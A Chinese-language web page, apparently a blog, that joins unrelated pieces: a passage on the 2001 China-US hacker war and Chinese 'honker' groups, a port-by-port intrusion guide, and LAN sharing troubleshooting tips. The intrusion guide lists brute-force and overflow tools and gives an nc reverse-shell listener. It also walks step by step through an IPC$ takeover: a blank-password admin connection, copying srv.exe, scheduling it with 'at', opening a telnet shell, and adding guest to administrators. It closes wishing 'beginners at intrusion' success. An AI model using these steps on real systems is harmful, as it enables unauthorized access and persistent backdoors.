便是攻击中国网站的主力,而一个名为 pr0phet 的黑客则更是明确地说:“我一开始只是随机挑选一些网站作为攻击目标,不过现在我则主要攻击以 .edu.cn 和 ac.cn 结尾的网站,或者只是以 .cn 结尾的网站,都会成为我的攻击目标。”在这种气氛和情况下( 5 月 8 日又逢中国驻南使馆被炸两周年),中国黑客在 4 月 30 日 至 5 月 8 日打响了大规模的“第六次卫国网络战”。对于这次中美黑客大战的“战绩”,不同媒体的报道有很大出入,据“中国红客联盟”负责人称,真正被攻破的美国网站到 5 月 7 日 为止有 1600 多个,其中主要的网站 ( 包括政府和军方的网站 ) 有 900 多个。而中国被攻破的网站有 1100 多个,主要网站有 600 多个。实际上,任何一次黑客战争既不可能事先公开“宣战”,更不可能有“终战”的截止日期。 这次中美黑客大战有以下特点: 1 、中国黑客的攻击事出有因 在中国黑客的这次行动中,“中国红客网络安全技术联盟”(简称“中国红客联盟”, HUC )是最瞩目的攻击主力,它使“红客”这一称谓再次叫响。其负责人 Lion 在 2000 年 12 月 1 日就提出建议:“统一“红客”一词的英文名称( honker )。“红客”一词若能在英文中占有一席之地,这将具有非同寻常的意义!这样红客在世界范围内的交流与应用将变得更加方便;更重要的是,这样做能扩大影响力,增强凝聚力,促进红客文化的形成和进一步的发展!”也就是说中国黑客试图通过“红客”名称的确认,来赋予自己在一种特定情况下所作所为的正面形象。中国黑客涂改美国网页尽管也有以谩骂方式来泄愤,但主流是中国国旗、中国国歌和“伟大的中华民族万岁!”、“美国必须对撞机事件负完全责任”、“抗议美国向台湾出售武器,破坏世界和平!”等口号,实践着“维护祖国统一、捍卫国家主权、一致抵抗外辱、打击反华气焰”的行动宗旨。 2 、中国黑客的攻击具有群体规模 “中国红客联盟”、“中华黑客联盟”和“中国鹰派联盟”是攻击美国网站的主力,由于以往通过各种形式奠定的组织基础,因此得以在这次攻击行动中发挥群体力量,并带动了一大批临时参战的“菜鸟”(即技术生疏的新手)。如 4 月 30 日晚 7 点,“中国红客联盟”召开了“攻击美国网络动员大会”,并提供了更换美国网页的专用数据包;再如 5 月 4 日晚,中国黑客集中力量攻击白宫网站,据称参与人数有 8 万之众,事后白宫网站的新闻负责人吉米承认“大量数据同时涌入,堵塞了白宫与其互联网服务提供商的连接通道”。中国黑客万众一心的行动并且其间的出色协调,使得美国方面怀疑这次中国政府如果说没有背后支持,至少也是默许的。加拿大军事评论家、汉和情报评论高级分析员平可夫在香港《亚洲周刊》(第 19 期, 5 月 13 日)撰文称此次中国黑客的攻击为一场“新人民战争”,而这场战争的主体往往是可以称为“信息战网络战民兵”的庞大群体,武器是计算机、杀伤性火力构成是知识和技能,战场便是信息网络。 3 、中国黑客群体由年轻人组成 据媒体报道,“中国鹰派联盟”负责人老鹰,“中国红客联盟”负责人 lion,其专业还不是计算机。 Bkbll 称“中国红客联盟”成员的平均年龄并不是媒体报道的 23 岁,而是更年轻,同时注册成员的 65% 是在校大学生。中国互联网信息中心( CNNIC )历次调查显示, 30 岁以下的青少年占全体网民的绝大多数。如最近一次调查显示(截止日期为 2000 年 12 月 31 日), 8 个年龄段中, 18 至 24 岁占 41.18% , 25 至 30 岁占 18.8% , 18 岁以下占 14.93% ,也就是说, 18 至 30 岁年龄段的用户占到 2250 万总体的 75% 。今年中国网络用户预计将突破 3500 万, 2005 年将达到 2 亿,占全体国民的 15% 。从发展看,如此规模巨大的中国青年网络用户群体的网络行为,今后不论是对内还是对外,都将产生更大的效应。 这一代人( 20 世纪 70 、 80 年代生人)成长的环境与老一代完全不同,拥有的知识与技能完全不同,价值观也发生了很大变化。但“中国鹰派联盟”在致美国总统公开信中一段话是颇为意味深长的:“过去短短的一百年里,中国人的日历充满了太多的苦难和积怨。为我们抚慰感伤的人,我们永远感激;为我们伤口撒盐的人,我们更不会忘记。我们的下一代,已经在肯德鸡、麦当劳中长大,每月去看一部制作精美的好莱坞电影,也已经成为很多中国人的习惯。但有趣的是,正当我们的前辈们为此忧心重重的时候,把他们敲醒的却往往还是你们自己。” 11月16日 各个网络端口的入侵方法1. 1433端口入侵 scanport.exe 查有1433的机器 SQLScanPass.exe 进行字典暴破(字典是关键) 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。 nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口 (以上反向的,测试成功) sqlhelloz.exe 入侵ip 1433 (这个是正向连接) 2. 4899端口入侵 用4899过滤器.exe,扫描空口令的机器 3. 3899的入侵 对很早的机器,可以试试3389的溢出(win3389ex.exe) 对2000的机器,可以试试字典暴破。(tscrack.exe) 4. 80入侵 对sp3以前的机器,可以用webdav入侵; 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe) 可以利用SQL进行注入。(啊D的注入软件)。 5. serv-u入侵(21端口) 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) 对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe) 对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs) 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码 6. 554端口 用real554.exe入侵。 7. 6129端口 用DameWare6129.exe入侵。 8. 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。 9. 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。 10. 其他入侵 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。 经典IPC$入侵 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。 2. C:\>copy srv.exe $">\\127.0.0.1\admin$ 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。 3. C:\>net time file://127.0.0.1/ 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at file://127.0.0.1/ 11:05 srv.exe 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊. 5. C:\>net time file://127.0.0.1/ 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了 7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$ 用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。 8. C:\WINNT\system32>ntlm 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组 10. C:\>net user guest /active:yes 将对方的Guest用户激活 11. C:\>net user guest 1234 将Guest的密码改为1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 最后达到ADMINISTRATOR的权限 希望能对初学入侵的有所帮助 局域网不能互访的问题1、启用guest来宾帐户;
2、控制面板→管理工具→本地安全策略→本地策略→用户权利指派里,“从网络访问此计算机”中加入guest帐户,
而“拒绝从网络访问这台计算机”中删除guest帐户;
3、我的电脑→工具→文件夹选项→查看→去掉“使用简单文件共享(推荐)”前的勾; 4、控制面板→管理工具→本地安全策略→本地策略→安全选项里,把“网络访问:本地帐户的共享和安全模式”设为
“仅来宾-本地用户以来宾的身份验证”(可选,此项设置可去除访问时要求输入密码的对话框,也可视情况设为“经
典-本地用户以自己的身份验证”);
5、右击“我的电脑”→“属性”→“计算机名”,该选项卡中有没有出现你的局域网工作组名称,如“work”等。
然后单击“网络 ID”按钮,开始“网络标识向导”:单击“下一步”,选择“本机是商业网络的一部分,用它连接到
其他工作着的计算机”;单击“下一步”,选择“公司使用没有域的网络”;单击“下一步”按钮,然后输入你的局
域网的工作组名,如“work”,再次单击“下一步”按钮,最后单击“完成”按钮完成设置
6、检查本地连接是否被禁用,右击“本地连接”→“启用”;
7、关闭网络防火墙; 8、检查是否启用了域,是否加入了该域并检查域设置; 9、检查是否关闭了server服务; 10、检查本地连接IP、子网掩码、网关及DNS设置是否有误; 11、“本地连接”→属性→常规,检查是否安装了“Microsoft网络文件和打印机共享”、“Microsoft网络客户端”
以及TCP/IP协议;
12、某些局域网游戏和软件须安装NetBEUI协议。而且网上有文章说,在小型局域网中,微软在WinXP中只支持的 TCP/IP协议和NWLink IPX/SPX/NetBIOS兼容协议表现不尽如人意,在小型局域网(拥有200台左右电脑的网络)中
NetBEUI是占用内存最少、速度最快的一种协议。
给系统打上补丁。WinXP访问网上邻居的速度较慢,这是WinXP的一个Bug,当我们打开网上邻居时,操作系统首先会从 计划任务中进行查找,因此就大大影响了访问的速度,除非您已经安装了SP1补丁才不会存在这个问题。
13、先卸载网卡驱动,重启再重装; 14、硬件问题,检查网卡、网线、集线器、路由器等,在检查之前,最好先重启一下网络设备(集线器、交换机、路由 器)看能否解决;
15、病毒(木马)原因。升级病毒库安全模式下全盘杀毒。 |
|
|
